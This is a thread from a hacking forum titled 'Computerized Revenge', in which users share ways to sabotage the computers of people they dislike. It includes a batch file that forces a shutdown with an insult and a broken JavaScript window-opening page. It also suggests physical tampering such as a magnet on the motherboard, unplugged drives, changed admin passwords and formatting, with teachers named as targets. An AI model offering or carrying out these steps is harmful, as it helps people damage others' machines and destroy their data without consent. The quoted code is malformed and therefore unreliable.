Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Computerized Revenge

0 0

If someone has pissed you off, here are some very evil and malicious things you can do to their computer if you have physical access or get someone stupid..you'll see what i mean:

1.) For the admin, craft a nice little .bat file. Here : AUTOEXEC.bat <—name of file save into the c:\ @echo off <––turns the echo off… shutdown * -s -t 5 -c That's what you get for f*cking with me! <—shuts down computer and displays that little message on the screen. Shuts down after 5 seconds (-t).

2.) Either you're user is not an admin, or you just don't like that technique, you could craft a fun little html page.(remember to use brackets) html title have a nice day /title head h1 Curiousity killed the Cat! /h1 /head body script type="text/javascript"> loops=3 num=1 while(num=loops) {window.open="the name of this page (.html, fun.html, whatever you named it)" /script script language="Javascript"> self.location=self.location> /script /body /html

Now, get them to open it up and watch

This is from a friend named Ice_Maiden

My fave little revenge technique is simple, and has them guessin for hours what the fcuk happened.

well theres a few

1. unplug as much as you can from the inside…. most people dont check whether the harddrive is plugged in…..lol funny watchin them scratchin their heads

2. stick a magnet behind the motherboard, takes a while to work… but will work for good, only use on those that really do your head in, like teachers

3. Change the admin passwords…. just go into safe mode and change em all…. then watch em format it

4. Format it anyway if u have the time… but if u really wanna confuse them, save a screenshot of their old desktop and use it as the wallpaper… just remember to save it to floopy BEFORE u format….

yeah this is all simple stuff, but its funny as fcuk to watch,a nd takes little to no knowledge or effort to do…lol

Anyone got any other fun ideas?

0 1

submit this as a article!!

0 0

Alright, i submitted it as an article..